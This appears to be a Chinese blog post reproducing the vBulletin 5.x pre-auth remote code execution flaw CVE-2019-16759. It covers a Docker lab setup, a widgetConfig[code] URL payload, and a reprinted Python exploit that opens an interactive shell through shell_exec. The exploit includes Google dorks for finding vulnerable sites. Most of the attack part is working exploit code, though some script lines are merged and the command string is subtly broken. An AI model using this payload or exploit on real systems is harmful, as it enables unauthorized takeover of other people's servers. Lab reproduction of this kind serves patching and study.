vBulletin 5.x RCE（CVE-2019-16759 ）复现

环境搭建

使用docker安装

docker run -ti -p 80:80 --name vbulletin -d p8361/vbulletin-cve-2015-7808

docker exec -it e4fce6b1886c /bin/bash

# update然后装vim

apt-get update

apt install vim

# 改配置

vim /etc/apache2/apache2.conf# 最下面补这个配置

ServerName localhost:80

# 给根目录下run.sh权限并启动chmod +x ./run.sh

./run.sh

 

漏洞复现

http://YOUR-IP/?routestring=ajax%2Frender%2Fwidget_php&widgetConfig[code]=phpinfo();exit;

漏洞POC参考：https://seclists.org/fulldisclosure/2019/Sep/31

#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
# 
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"import requestsimport sysif len(sys.argv) != 2:
    sys.exit("Usage: %s " % sys.argv[0])
params = {"routestring":"ajax/render/widget_php"}while True:
    try:
        cmd = raw_input("vBulletin$")
        params["widgetConfig[code]"] = "echo shell_exec('cmd+'); exit;"
        r = requests.post(url = sys.argv[1], data = params)
        if r.status_code == 200:
            print r.text
        else:
            sys.exit("Exploit failed! :(")
    except KeyboardInterrupt:
        sys.exit("\nClosing shell...")
    except Exception, e:
        sys.exit(str(e))

修复建议

升级到最新版